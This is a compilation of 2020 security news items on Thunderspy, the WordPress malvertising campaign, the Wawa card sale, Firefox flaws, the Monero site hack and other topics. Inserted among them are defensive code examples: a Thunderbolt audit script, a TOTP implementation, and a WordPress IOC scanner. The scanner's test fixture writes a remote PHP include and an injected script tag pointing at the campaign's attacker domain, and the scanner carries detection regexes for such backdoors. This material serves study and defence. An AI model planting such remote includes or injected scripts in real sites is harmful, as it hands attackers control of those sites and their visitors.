Cynet Offers IR Specialists Grants up to $1500 for each IR Engagement

Previously, autonomous breach protection company Cynet announced that it is making the Cynet 360 threat detection and response platform available at no charge to IR (incident response) service providers and consultants.


Today Cynet takes another step and announces a $500 grant for incident responders for each IR engagement in which Cynet 360 was used, with an additional $1,000 grant if the customer purchases an annual Cynet 360 subscription after the IR process is concluded.
Learn about this new offering here.


Incident response investigations come in a thousand different variations, but most can be broken down into two main parts. The first is discovering the few suspicious machines, user accounts, and network connections out of the mass activities within the attacked environment.


The second part follows these discoveries and involves a surgical collection and analysis of forensic artifacts to refute or validate the suspicion and, if validated, to establish the full root cause and impact of the attack.


While IR pros have a wide array of commonly used open-source tools for a deep-dive forensic investigation of a single suspicious machine or a handful of them, there is an acute shortage of available tools for the first part.


That’s mainly because finding the proverbial compromised needle in the haystack of a mostly non-compromised environment requires complete visibility into process execution, network traffic, and user activity across the entire environment.


This is where Cynet 360 comes in. With an enterprise-grade distribution infrastructure providing seamless deployment across thousands of endpoints in minutes, Cynet 360 empowers responders to effortlessly gain the required visibility into the initial part of the investigation, easily pinpointing the entities that should be further investigated.


Cynet 360 provides incident responders with the following capabilities that cover both the investigation and the remediation parts of the response process.

Full Environment Visibility
  • Gain instant visibility into any host, file, process, log, network traffic, and user activity.
  • Get a verdict, attack scope, and all indicators immediately.
  • Use Cynet’s central management to distribute other open source IR tools across the environment.
Precise Threat Knowledge
  • Get real-time, accurate threat knowledge auto-generated by the Cynet 360 correlation engine.
  • For deep-dive investigations, leverage granular forensic tools to conduct an end-to-end investigation to determine the attack’s scope and impact.
  • Trust your own skills – Proactively hunt
Complete Recovery Actions
  • Isolate infected hosts, disable compromised user accounts, remove malicious files, and block risky network connections.
  • Craft your own remediation policies for automated threat block and removal.

Learn more about this new offering for incident responders here.



via:  thehackernews



7 New Flaws Affect All Thunderbolt-equipped Computers Sold in the Last 9 Years

A cybersecurity researcher today uncovered a set of seven new unpatchable hardware vulnerabilities that affect all desktops and laptops sold in the past nine years with Thunderbolt, or Thunderbolt-compatible USB-C, ports.

Collectively dubbed ‘ThunderSpy,’ the vulnerabilities can be exploited in 9 realistic evil-maid attack scenarios, primarily to steal data or read/write all of the system memory of a locked or sleeping computer—even when drives are protected with full disk encryption.

In a nutshell, if you think someone with a few minutes of physical access to your computer—regardless of the location—can cause any form of significant harm to you, you’re at risk for an evil maid attack.

According to Björn Ruytenberg of the Eindhoven University of Technology, the ThunderSpy attack “may require opening a target laptop’s case with a screwdriver, [but] it leaves no trace of intrusion and can be pulled off in just a few minutes.”


In other words, the flaws are not linked to network activity or any related component, and thus cannot be exploited remotely.

“Thunderspy works even if you follow best security practices by locking or suspending your computer when leaving briefly, and if your system administrator has set up the device with Secure Boot, strong BIOS and operating system account passwords, and enabled full disk encryption,” the researcher said.

Besides any computer running Windows or Linux, Thunderbolt-equipped Apple MacBooks sold since 2011, except Retina versions, are also vulnerable to Thunderspy, though only partially.

ThunderSpy Vulnerabilities

The following list of seven Thunderspy vulnerabilities affects Thunderbolt versions 1, 2 and 3, and can be exploited to create arbitrary Thunderbolt device identities, clone user-authorized Thunderbolt devices, and finally, obtain PCIe connectivity to perform DMA attacks.

  1. Inadequate firmware verification schemes
  2. Weak device authentication scheme
  3. Use of unauthenticated device metadata
  4. Downgrade attack using backward compatibility
  5. Use of unauthenticated controller configurations
  6. SPI flash interface deficiencies
  7. No Thunderbolt security on Boot Camp

For those unaware, direct memory access (DMA) attacks against the Thunderbolt port are not new and have previously been demonstrated with the ThunderClap attacks.

DMA-based attacks let attackers compromise targeted computers in a matter of seconds just by plugging a malicious hot-plug device, such as an external network card, mouse, keyboard, printer, or storage device, into a Thunderbolt port or the latest USB-C port.

In brief, DMA attacks are possible because the Thunderbolt port operates at a very low level with highly privileged access to the computer, allowing connected peripherals to bypass operating system security policies and directly read or write system memory, which may contain sensitive information including passwords, banking logins, private files, and browser activity.


To prevent DMA attacks, Intel introduced some countermeasures, one of which is ‘security levels’, which prevent unauthorized Thunderbolt PCIe-based devices from connecting without user authorization.

“To further strengthen device authentication, the system is said to provide ‘cryptographic authentication of connections’ to prevent devices from spoofing user-authorized devices,” the researcher said.

However, by combining the first three Thunderspy flaws, an attacker can break the ‘security levels’ feature, and load an unauthorized malicious Thunderbolt device by forging Thunderbolt device identities, as shown in a video demonstration shared by Ruytenberg.

“Thunderbolt controllers store device metadata in a firmware section referred to as Device ROM (DROM). We have found that the DROM is not cryptographically verified. Following from the first issue, this vulnerability enables constructing forged Thunderbolt device identities,” he added.

“In addition, when combined with the second issue, forged identities may partially or fully comprise arbitrary data.”


“In addition, we show unauthenticated overriding of Security Level configurations, including the ability to disable Thunderbolt security entirely, and restoring Thunderbolt connectivity if the system is restricted to exclusively passing through USB and/or DisplayPort,” he added.

“We conclude this report by demonstrating the ability to permanently disable Thunderbolt security and block all future firmware updates.”

According to Ruytenberg, some systems shipped since 2019 include Kernel DMA Protection, which partially mitigates the Thunderspy vulnerabilities.

To know if your system is affected by Thunderspy vulnerabilities, Ruytenberg has also released a free and open-source tool, called Spycheck.
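A Linux-side version of that check, added here as an example (it is not the researcher's Spycheck and does not reproduce Spycheck's logic): it reads the kernel's own Thunderbolt sysfs attributes, treats a domain's `iommu_dma_protection` flag as the Kernel DMA Protection the report names as a partial mitigation, and lowers the verdict wherever protection rests on device identity alone, which is exactly what forged identities defeat. The verdict labels, the `make_fixture` helper and the sample devices are constructed for this example; the sysfs paths are the kernel's.

```python
# Added example (not from the Thunderspy report or the Spycheck tool): audit a Linux
# host's Thunderbolt security level and kernel DMA protection via sysfs.
# Kernel interfaces read (see Documentation/admin-guide/thunderbolt.rst):
#   sys/bus/thunderbolt/devices/domainN/security              none|user|secure|dponly|usbonly|nopcie
#   sys/bus/thunderbolt/devices/domainN/iommu_dma_protection  "1" when tunnelled PCIe is IOMMU-confined
#   sys/bus/thunderbolt/devices/<id>/authorized, vendor_name, device_name   per connected device
# `root` defaults to "/" so it runs on a live host; make_fixture() builds a constructed tree.
import tempfile
from pathlib import Path

# Verdict labels are this example's own, ordered from best to worst.
VERDICT_RANK = {"protected": 0, "thunderspy-exposed": 1, "unprotected": 2}


def _read(path):
    try:
        return path.read_text().strip()
    except OSError:
        return None


def classify_domain(security, dma_protection):
    """Map one controller's settings to a verdict.

    Thunderspy forges device identities, so 'user'/'secure' do not hold on their own,
    and the report says security-level configuration can be overridden, so the PCIe-
    denying levels are not trusted either. Only kernel DMA protection counts as a real
    mitigation; 'none' without it is the classic open-DMA state.
    """
    if dma_protection:
        return "protected"
    if security == "none":
        return "unprotected"
    return "thunderspy-exposed"


def audit_thunderbolt(root="/"):
    devdir = Path(root) / "sys/bus/thunderbolt/devices"
    report = {"domains": {}, "devices": [], "verdict": "no-thunderbolt"}
    if not devdir.is_dir():
        return report
    domains = sorted(devdir.glob("domain*"))
    if not domains:
        return report
    for d in domains:
        security = _read(d / "security") or "unknown"
        dma_prot = _read(d / "iommu_dma_protection") == "1"
        report["domains"][d.name] = {
            "security": security,
            "iommu_dma_protection": dma_prot,
            "verdict": classify_domain(security, dma_prot),
        }
    # Connected devices live in directories such as "0-1"; authorized == 1 means the
    # kernel granted that identity a PCIe tunnel, i.e. the kind of identity an attacker clones.
    for dev in sorted(p for p in devdir.iterdir() if p.is_dir() and not p.name.startswith("domain")):
        report["devices"].append({
            "id": dev.name,
            "vendor": _read(dev / "vendor_name"),
            "device": _read(dev / "device_name"),
            "authorized": _read(dev / "authorized") == "1",
        })
    report["verdict"] = max(
        (d["verdict"] for d in report["domains"].values()), key=VERDICT_RANK.__getitem__
    )
    return report


def make_fixture(security, dma_protection=None, devices=()):
    """Constructed sysfs tree for offline runs (test fixture, not a real host); returns its root."""
    root = tempfile.mkdtemp(prefix="tbaudit-")
    dom = Path(root) / "sys/bus/thunderbolt/devices/domain0"
    dom.mkdir(parents=True)
    (dom / "security").write_text(security + "\n")
    if dma_protection is not None:
        (dom / "iommu_dma_protection").write_text(f"{dma_protection}\n")
    for dev_id, vendor, name, authorized in devices:
        d = dom.parent / dev_id
        d.mkdir()
        (d / "vendor_name").write_text(vendor + "\n")
        (d / "device_name").write_text(name + "\n")
        (d / "authorized").write_text(f"{authorized}\n")
    return root


if __name__ == "__main__":
    import json
    print(json.dumps(audit_thunderbolt(), indent=2))
```

On Windows the equivalent is the "Kernel DMA Protection" row in System Information (msinfo32). A "protected" verdict here only means tunnelled PCIe is IOMMU-confined; it says nothing about the SPI-flash and firmware-update issues the report lists, which no OS setting addresses.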

Interestingly, when the researcher reported the Thunderspy vulnerabilities to Intel, the chip company revealed it had already been aware of some of them, with no plans to patch them or disclose them to the public.

Ruytenberg claims to have found more potential vulnerabilities in the Thunderbolt protocol, which are part of ongoing research and are expected to be revealed as ‘Thunderspy 2.’

In conclusion, if you consider yourself a potential target of evil-maid attacks and carry a Thunderbolt system with you, avoid leaving your devices unattended, power off the system completely, or at least use hibernation instead of sleep mode.

Besides this, if you want to be more paranoid, avoid leaving your Thunderbolt peripherals unattended or lending them to anybody.


via:  thehackernews



Google Authenticator Users Can Now Transfer 2SV Secrets Between Devices

Google announced that Google Authenticator users can now transfer 2-Step Verification (2SV) secrets between devices.

The new feature is meant to make it easier for users to manage their Google Authenticator 2SV codes across multiple devices.

The 2SV secrets represent the data that is used to generate 2SV codes across devices that have Google Authenticator installed. With the new feature, users can transfer the data to a new device when upgrading, Google says.
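To make concrete what a "2SV secret" is and why its transfer is sensitive, here is an added example (not Google's code) that derives codes from one the way an authenticator app does, per RFC 6238 and RFC 4226: the secret is a shared key, the app hashes it with the current 30-second counter, and whoever holds the secret can produce the same codes. The key below is the RFC test vector, not an account secret; `verify_totp` and its drift window are the server side as a practitioner would write it, not Google's implementation.

```python
# Added example, not Google Authenticator's code: TOTP (RFC 6238) over HOTP (RFC 4226).
# The "2SV secret" an authenticator exports is the shared key `K`; the code for a
# 30-second window is HOTP(K, floor(unix_time / 30)).
import base64
import hashlib
import hmac
import struct
import time

# RFC 4226/6238 reference key ("12345678901234567890" as ASCII) in the base32 form an
# authenticator QR code carries. Published test vector, not a real account secret.
RFC6238_SECRET_B32 = base64.b32encode(b"12345678901234567890").decode()


def decode_secret(secret_b32):
    """Authenticator secrets are base32, often lower-case, space-separated or unpadded."""
    cleaned = secret_b32.strip().replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)
    return base64.b32decode(cleaned)


def hotp(key, counter, digits=6, digestmod=hashlib.sha1):
    """RFC 4226: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def totp(secret_b32, at=None, step=30, digits=6):
    """RFC 6238: HOTP with the counter derived from Unix time (what the app displays)."""
    at = time.time() if at is None else at
    return hotp(decode_secret(secret_b32), int(at) // step, digits)


def verify_totp(secret_b32, candidate, at=None, step=30, window=1):
    """Server-side check: accept +/- `window` steps of clock drift, compare in constant time."""
    at = time.time() if at is None else at
    counter = int(at) // step
    key = decode_secret(secret_b32)
    return any(
        hmac.compare_digest(hotp(key, counter + drift), candidate)
        for drift in range(-window, window + 1)
    )


if __name__ == "__main__":
    print("RFC 6238 vector, T=59:", totp(RFC6238_SECRET_B32, at=59))  # 287082
    print("code for now:", totp(RFC6238_SECRET_B32))
```

The point for the transfer feature: exporting the secret exports the ability to mint valid codes indefinitely, so the QR code shown during the device-to-device transfer is as sensitive as the account password and must not be photographed, screenshotted or shown on a shared screen.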

The much anticipated feature is now available in the latest version of Google Authenticator on Android (version 5.10), the Internet company announced.

“Using 2SV, 2-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is critical to protecting your accounts from unauthorized access. With these mechanisms, users verify their identity through their password and an additional proof of identity, such as a security key or a passcode,” Google said.

Google Authenticator aims not only to provide an easy way to use 2SV on accounts, but also to improve the security of the login process, compared to options such as receiving passcodes via text messages.

To ensure that users can keep their accounts safe, Google also took a series of measures to minimize the attack surface in spite of the newly announced feature.

Thus, no data is sent to Google’s servers when the user transfers 2SV secrets, as the communication takes place between the two devices only.

“Your 2SV secrets can’t be accessed without having physical access to your phone and the ability to unlock it,” the Internet giant notes.

Furthermore, alerting mechanisms and in-app logs were implemented, so as to make users fully aware of the fact that the transfer function has been used.


via:  securityweek



Nearly 1 Million WordPress Sites Targeted via Old Vulnerabilities

A large-scale attack campaign has targeted over 900,000 WordPress websites through vulnerabilities in plugins and themes, WordPress security company Defiant revealed this week.

The attacks were initially discovered on April 28, but showed a massive spike on May 3, when more than half a million websites were hit. Likely the work of a single threat actor, the campaign is aimed at injecting the target websites with malicious JavaScript designed to redirect visitors to malvertising sites.

Responsible for only a small volume of attacks in the past, the threat actor has ramped up the operation, with over 20 million attacks registered on May 3. The researchers discovered that, over the past month, over 24,000 distinct IP addresses were used to attack more than 900,000 sites.

“Due to the sheer volume and variety of attacks and sites that we’ve seen targeted, it is possible that your site may be exposed to these attacks, and the malicious actor will likely pivot to other vulnerabilities in the future,” Defiant says.

The targeted vulnerabilities are not new and have been abused in previous attacks as well. These include Cross-Site Scripting (XSS) vulnerabilities in the Easy2Map plugin (removed from the WordPress repository in August 2019), Blog Designer (patched in 2019), and Newspaper theme (patched in 2016), and options update bugs in WP GDPR Compliance (patched in late 2018), and Total Donations (removed in early 2019).

“Although it is not readily apparent why these vulnerabilities were targeted, this is a large scale campaign that could easily pivot to other targets,” Defiant says.

The JavaScript code the attackers attempt to insert into the targeted websites is located at count[.]trackstatisticsss[.]com/stm and also checks whether the visitor has any WordPress login cookies set. The attackers hope that the script will execute in an administrator’s browser.

Visitors who are not logged in and are not on the login page are redirected to a malvertising site. If the script runs in a logged-in administrator’s browser, it instead attempts to inject a malicious PHP backdoor into the current theme’s header, along with a second malicious JavaScript.

The backdoor downloads another payload from https://stat[.]trackstatisticsss[.]com/n.txt and attempts to execute it by including it in the theme header.

“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” Defiant says.

The final payload used in this attack was designed to prepend a variant of the initial script to every JavaScript file on the site, as well as to all .htm, .html, and .php files named “index.” It also rechecks the infected site every 6,400 seconds and re-infects it if necessary.
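A read-only sweep for the traces described above, added as an example (not Defiant/Wordfence code and not their scanner): it flags files that reference the campaign's domain, a theme `header.php` that includes code from a URL, and a remote script tag prepended to `.js` or `index.*` files. The regexes, finding labels and the sample site are constructed for this example; only the domain comes from the write-up.

```python
# Added example (not Defiant/Wordfence code): sweep a WordPress document root for the
# artefacts the write-up describes. Checks:
#  1. any PHP/JS/HTML file mentioning the published campaign domain;
#  2. a theme header.php that include()s or eval()s code fetched from a URL (the backdoor);
#  3. a script pointing at a remote host sitting at the top of a .js or index.* file
#     (where the re-infector prepends it).
import re
import tempfile
from pathlib import Path

IOC_HOSTS = ("trackstatisticsss.com",)  # from the write-up; defanged brackets removed
REMOTE_INCLUDE_RE = re.compile(
    r"\b(include|include_once|require|require_once|eval|file_get_contents)\s*\(?\s*['\"]https?://",
    re.I,
)
PREPENDED_SCRIPT_RE = re.compile(r"""(<script[^>]+src=|\.src\s*=\s*)['"]https?://""", re.I)
INDEX_NAMES = {"index.htm", "index.html", "index.php"}
SCAN_SUFFIXES = {".php", ".js", ".htm", ".html"}


def scan_file(path):
    """Return the list of findings for one file (empty list means clean)."""
    findings = []
    try:
        text = path.read_bytes().decode("utf-8", errors="replace")
    except OSError:
        return findings
    for host in IOC_HOSTS:
        if host in text:
            findings.append(f"ioc-host:{host}")
    if path.name == "header.php" and REMOTE_INCLUDE_RE.search(text):
        findings.append("remote-include-in-theme-header")
    if (path.suffix == ".js" or path.name in INDEX_NAMES) and PREPENDED_SCRIPT_RE.search(text[:2048]):
        findings.append("prepended-remote-script")
    return findings


def scan_wordpress(root):
    """Walk the site; return {relative_path: [findings]} for files that hit anything."""
    root = Path(root)
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in SCAN_SUFFIXES:
            found = scan_file(p)
            if found:
                hits[str(p.relative_to(root))] = found
    return hits


def make_sample_site():
    """Constructed site: a clean theme file, a backdoored header, a prepended JS file."""
    root = tempfile.mkdtemp(prefix="wpscan-")
    theme = Path(root) / "wp-content/themes/twentytwenty"
    theme.mkdir(parents=True)
    (theme / "functions.php").write_text("<?php add_action('init', 'my_init');\n")
    (theme / "header.php").write_text(
        "<?php include('https://stat.trackstatisticsss.com/n.txt'); ?>\n<!DOCTYPE html>\n"
    )
    js = Path(root) / "wp-includes/js"
    js.mkdir(parents=True)
    (js / "jquery.js").write_text(
        "var s=document.createElement('script');s.src='https://count.trackstatisticsss.com/stm';"
        "document.head.appendChild(s);\n/*! jQuery */\n"
    )
    (Path(root) / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_site()
    for rel, why in sorted(scan_wordpress(target).items()):
        print(rel, ", ".join(why))
```

Run it against the real document root (`python scan.py /var/www/html`). A hit is a reason to restore the file from a known-good copy rather than to strip the injected lines, since the payload re-checks the site and re-infects it; the abandoned plugins named above are best removed with WP-CLI (`wp plugin deactivate <slug>` then `wp plugin delete <slug>`).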

Site owners are advised to keep all of their plugins updated and to deactivate and delete those plugins that have been removed from the WordPress plugin repository, to ensure their websites are protected.


via: securityweek



Firefox 76 Brings Security Patches, Breached Password Alerts

Mozilla this week released Firefox 76 to the stable channel with an updated password manager, alerts for breached passwords, and patches for 11 vulnerabilities.

Starting with the new release, the browser aims to help users better keep their accounts secure and easily generate strong passwords, courtesy of the new Firefox Lockwise password manager.

On shared devices, the feature keeps passwords secure by prompting users for their account password before making saved logins available to them. Furthermore, the credentials are made available for five minutes only, Mozilla says.

The Lockwise dashboard, the browser maker explains, is powered by Firefox Monitor, which alerts users when their credentials were part of a data breach.

Firefox alerts users when one of their passwords is identical to a password that has been compromised, and also when the username and password pair itself was part of a breach (additional details about the breach are also included).

“Don’t worry, Firefox doesn’t know your actual passwords. This new feature automatically checks your encrypted list of passwords against the breached website information, helping you to stay on top of your online accounts that may have been compromised,” Mozilla explains.

The organization also points out that users can now leverage Firefox Lockwise to generate passwords of a minimum of 12 random letters, numbers and symbols.

Furthermore, Mozilla has made Firefox Lockwise available for iOS and Android as well, allowing users to access their passwords while on the go and easily sync their logins.

Firefox 76 also arrived with patches for 11 vulnerabilities, including three assessed with a critical severity rating.

The first of the critical bugs is a use-after-free during worker shutdown (CVE-2020-12387), which could lead to an exploitable crash, the second is a sandbox escape (CVE-2020-12388) that impacts Windows only, while the third (CVE-2020-12395) refers to memory safety bugs in both Firefox 75 and Firefox ESR 68.7.

The new browser release also patches three high severity issues (CVE-2020-12389 – sandbox escape; CVE-2020-6831 – buffer overflow; and CVE-2020-12396 – memory safety bugs), four moderate risk bugs (CVE-2020-12390 – incorrect serialization; CVE-2020-12391 – Content-Security-Policy bypass; CVE-2020-12392 – arbitrary local file access; CVE-2020-12393 – potential command injection), and one low severity issue (CVE-2020-12394 – URL spoofing in the location bar when unfocused).

This week, Google too released an update for its Chrome browser, to address a total of three vulnerabilities, including two reported by external researchers. Both of these bugs are high severity issues: CVE-2020-6831 – a stack buffer overflow in SCTP, and CVE-2020-6464 – type confusion in Blink.

via:  securityweek



Microsoft Offering Up to $100,000 for Vulnerabilities in Azure Sphere

Microsoft announced a new security research challenge that encourages white hat hackers to find and responsibly disclose vulnerabilities in the company’s Azure Sphere solution.

Azure Sphere is an IoT security solution designed to provide end-to-end security across hardware, operating system and the cloud.

In an effort to identify potentially serious vulnerabilities in Azure Sphere, Microsoft has decided to run a three-month application-only challenge.

Hackers can apply for the Azure Sphere Research Challenge until May 15, and the challenge will run between June 1 and August 31. Researchers whose applications have been accepted will receive an email from Microsoft.

This new initiative, an expansion of the Azure Security Lab project announced last year, invites researchers to find vulnerabilities that would allow them to execute code on the Pluton security subsystem, which is the hardware-based secured root of trust for Azure Sphere, or in the Secure World operating environment of the Azure Sphere application platform. Microsoft is prepared to pay out up to $100,000 for these types of exploits.

While this research focuses on the Azure Sphere OS, vulnerabilities in other components could still receive a reward through the public Azure bug bounty program.

For the Azure Sphere Research Challenge, Microsoft has teamed up with several cybersecurity solutions providers, including Avira, Baidu, Bitdefender, Bugcrowd, Cisco, ESET, FireEye, F-Secure, HackerOne, K7 Computing, McAfee, Palo Alto Networks and Zscaler.

“While Azure Sphere implements security upfront and by default, Microsoft recognizes security is not a one-and-done event. Risks need to be mitigated consistently over the lifetime of a constantly growing array of devices and services. Engaging the security research community to research for high-impact vulnerabilities before the bad guys do is part of the holistic approach Azure Sphere is taking to minimize the risk,” Microsoft said.


via:  securityweek



Top IT Certifications for 2020

Whether you’re new to the IT field or deep in the technology trenches, knowing what is hot and, sometimes more importantly, what is not, can be critical to the next step in your career path. That’s why we’ve got you covered with the latest and greatest certifications that should be on your radar, based on sales trends and unshakeable predictions from a team of experts. So, let’s dive in on what you should be looking to get certified in for 2020!

10. CompTIA Linux+ (XK0-004)

What is new is old again! With the resurgence of Linux distros in the security and cloud realms, it is little surprise that brushing up on your bash scripting and command-line troubleshooting is what employers want to see these days. CompTIA released a new version of their Linux+ certification in October, streamlining their previous two exams into one and adding in security ninja skills to XK0-004.

9. Microsoft MCSA SQL Development (70-76x)

Cloud databases may be all the rage, but the basics are still in style. The staying power of Microsoft MCSA SQL Development (70-76x) for database admins and developers is a strong testament to that. We predict that business intelligence solutions around Azure will grow to eventually replace this certification, but not anytime soon. Whether on-premises or in the cloud, this certification hasn’t lost its shine within the database market.

8. (ISC)2 CISSP (CAT, April 2018)

Despite interest in other specializations like CCSP and CSSLP, the CISSP continues to be the top dog in the security industry. Although slipping in this list compared to other IT certifications, CISSP remains a gold standard that any IT professional, especially in a management role, should consider. These initials are not disappearing from the thousands on LinkedIn anytime soon!

7. Cisco CCNA (200-301)

Although well-known in networking circles, the CCNA has remained the same certification program for many years now. But in the Summer of 2019, all of that changed with a new blueprint emphasizing cloud-based automation. You’ve got until February to test on the old CCNA exam objectives, but stay tuned for a huge update that will be sending network engineers scrambling to update their skills and prove their mettle in 2020!

6. Oracle 12c SQL OCA (1Z0-071)

From self-healing databases to automated cloud AI, the Oracle database has many bells and whistles and still remains a popular choice for large, multinational enterprises. Not without its controversial claims, there is no doubt it is a titan in the database realm, and skilled administrators are in high demand. This is one of the first exams needed to certify as an Oracle Certified Associate (OCA). We saw this title jump into the top ten last year and believe it is a trend we’ll continue to see in 2020.

5. Network+ (N10-007)

This may seem like a head-scratcher, but it is clearly based on our 2019 numbers that more newbies are willing to learn the dark arts of networking. Some of these can be explained away by the huge IoT demand and the growing needs to better support the infrastructure for these devices. As we become more connected, we’ll need to grow the workforce to ensure those connections stay reliable and secure. Also as part of what many consider a core understanding of cybersecurity starting in A+, Network+, and Security+, it is a great start to whatever branch of cybersecurity you are interested in. With that in mind, it’s good to see some growth in this introductory networking certification.

4. EC-Council CEH (v10)

Certified Ethical Hacker is still the ultimate in red team certification, enticing many a hacker into the cameras-lights-action of penetration testing. This is a great, high-level introductory look into the world of a white hat hacker, as it covers ethics, reporting, and a general review of the types of tools used. Though we predict that this certification will continue to grow in 2020, expect blue team related certifications like Certified Network Defender (CND) to rise as more organizations focus on automated protection and scanning over manual exploitation.

3. CompTIA Security+ (SY0-501)

As the IT skills gap, especially in the security space, continues to exist, more individuals will be gravitating to the field with little or no knowledge. Vendor-neutral certifications targeted at the entry-level, specifically well-known ones like Security+, will continue their popularity, as it is again part of the core understanding, of getting a high-level look through the field of cybersecurity. Now this certification has dropped a couple of spots since last year, mainly because more IT professionals are honing their existing skills or dipping their toes into more specialized security professions. If 2019 was the year of security, expect 2020 to re-emphasize traditional IT roles.

2. Microsoft MCSA Windows Server (70-74x)

This certification is also showing some age, but Windows system admins are still needed even in the age of Azure. So it is no surprise that this certification continues to be popular. We expect continued popularity in 2020, but we’re also watching the trend of companies moving toward machine learning to maintain their virtualized networking solutions. Although not as many companies adopted machine learning in 2019 as expected, and adoption is not likely to increase significantly in 2020, it is a long-term trend that we’re keeping our eyes on.

1. CompTIA A+ (220-100x)

The future in IT has never been greater with more advanced devices requiring more skilled technicians to manage them. The new 2019 exam emphasizes the newest technologies found in the field, making it a must for a full-fledged hardware technician, or anyone looking to hone their tech support skills. We expect to see this certification’s popularity only grow in 2020.

Honorable Mentions

CCNA CyberOps

This was a new Cisco specialization in 2018, but we’re finally seeing some growth here. Keep your eye on this space.

 

PMI-ACP

This agile project management certification is one of PMI’s fastest growing, but it’s still not as popular as other project management certs. In 2020, this certification will remain a force to be reckoned with, even as the field of agile certification continues to widen.

 

Microsoft MCSA Azure

The slew of new Azure certifications, hot on the heels of the huge moves from various enterprises, including the DoD, ensure this certification will only grow in 2020. By adding performance-based labs to these exams, expect to see more and more cloud admins/developers jump on the bandwagon.

 

CompTIA CySA+

Slow to catch on until late last year, this certification is now growing steadily. We have every reason to expect its popularity among candidates will only grow in 2020. This certification hits right below the CASP and above the Security+ as an interesting intersection between a security auditor and analyst.

 

via:  kaplanittraining



Wawa Breach: Hackers Put 30 Million Stolen Payment Card Details for Sale

Remember the recent payment card breach at Wawa convenience stores?

If you’re among those millions of customers who shopped at any of 850 Wawa stores last year but haven’t yet hotlisted your cards, it’s high time to take immediate action.

That’s because hackers have finally put up payment card details of more than 30 million Wawa breach victims on sale at Joker’s Stash, one of the largest dark web marketplaces where cybercriminals buy and sell stolen payment card data.

As The Hacker News reported last month, on 10th December Wawa learned that its point-of-sale servers had malware installed since March 2019, which stole payment details of its customers from potentially all Wawa locations.


At that time, the company said it’s not aware of how many customers may have been affected in the nine-month-long breach or of any unauthorized use of payment card information as a result of the incident.

Now it turns out that the Wawa breach ranks among the largest payment card breaches in US history, potentially exposing 30 million sets of payment records.



According to threat intelligence firm Gemini Advisory, on 27th January 2020, hackers started uploading stolen payment card data from Wawa at Joker’s Stash marketplace, titled as ‘BIGBADABOOM-III,’ which reportedly includes card numbers, expiration dates, and cardholder names.

“While the majority of those records were from US banks and were linked to US-based cardholders, some records also linked to cardholders from Latin America, Europe, and several Asian countries,”  Gemini Advisory said.

“Non-US-based cardholders likely fell victim to this breach when traveling to the United States and transacting with Wawa gas stations during the period of exposure.”

“The median price of US-issued records from this breach is currently $17, with some of the international records priced as high as $210 per card.”


In the latest statement released yesterday, Wawa confirmed that the company is aware of reports of criminal attempts to sell customers’ payment card data and to help further protect its customers, the company has ‘alerted payment card processors, payment card brands and card issuers to heighten fraud monitoring activities.’

“We continue to encourage our customers to remain vigilant in reviewing charges on their payment card statements and to promptly report any unauthorized use to the bank or financial institution that issued their payment card by calling the number on the back of the card,” Wawa said.

Customers who bought anything from any Wawa convenience store between March and December last year are advised to block the affected cards and request new ones from their respective financial institutions.


via:  thehackernews



Critical Firefox 0-Day Under Active Attacks – Update Your Browser Now!

Attention! Are you using Firefox as your web browsing software on your Windows, Linux, or Mac systems?

If yes, you should immediately update your free and open-source Firefox web browser to the latest version available on Mozilla’s website.

Why the urgency? Mozilla earlier today released Firefox 72.0.1 and Firefox ESR 68.4.1 versions to patch a critical zero-day vulnerability in its browsing software that an undisclosed group of hackers is actively exploiting in the wild.

Tracked as ‘CVE-2019-17026,’ the bug is a critical ‘type confusion vulnerability’ that resides in the IonMonkey just-in-time (JIT) compiler of Mozilla’s JavaScript engine, SpiderMonkey.

In general, a type confusion vulnerability occurs when code does not verify the type of an object it is handed and operates on it as if it were another type, allowing attackers to crash the application or achieve code execution.

 


Without revealing details about the security flaw and any details on the ongoing potential cyberattacks, Mozilla said, “incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to type confusion.”

That means the issue in the vulnerable JavaScript engine component can be exploited by a remote attacker simply by tricking an unsuspecting user into visiting a maliciously crafted web page, executing arbitrary code on the system within the context of the application.

 

The vulnerability was reported to Mozilla by cybersecurity researchers at Qihoo 360 ATA, who have not yet released any information about their investigation, findings, or exploit.

Though Firefox, by default, automatically installs updates when they are available and activates the new version after a restart, you can always update manually using the built-in functionality by navigating to Menu > Help > About Mozilla Firefox.

 

via:  thehackernews



Official Monero Site Hacked to Distribute Cryptocurrency Stealing Malware


What an irony — someone hacked the official website of the Monero cryptocurrency project and quietly replaced legitimate Linux and Windows binaries available for download with malicious versions designed to steal funds from users’ wallets.

This supply-chain attack was revealed on Monday after a Monero user spotted that the cryptographic hash of the binaries he downloaded from the official site didn’t match the hashes listed on it.

Following an immediate investigation, the Monero team today also confirmed that its website, GetMonero.com, was indeed compromised, potentially affecting users who downloaded the CLI wallet between Monday 18th 2:30 am UTC and 4:30 pm UTC.


At this moment, it’s unclear how attackers managed to compromise the Monero website and how many users have been affected and lost their digital funds.

According to an analysis of the malicious binaries done by security researcher BartBlaze, attackers modified legitimate binaries to inject a few new functions in the software that executes after a user opens or creates a new wallet.



The malicious functions are programmed to automatically steal users’ wallet seed, the recovery phrase that restores access to the wallet, and send it to a remote attacker-controlled server, allowing the attackers to drain funds without any hassle.


“As far as I can see, it doesn’t seem to create any additional files or folders – it simply steals your seed and attempts to exfiltrate funds from your wallet,” the researcher said.

At least one GetMonero user on Reddit claimed to have lost funds worth $7000 after installing the malicious Linux binary.


“I can confirm that the malicious binary is stealing coins. Roughly 9 hours after I ran the binary, a single transaction drained my wallet of all $7000,” the user wrote. “I downloaded the build yesterday around 6 pm Pacific time.”

GetMonero officials assured its users that the compromised files were online for a very short amount of time and that the binaries are now served from another safe source.



The officials also strongly advised users to check the hashes of their binaries for the Monero CLI software and delete the files if they don’t match the official ones.

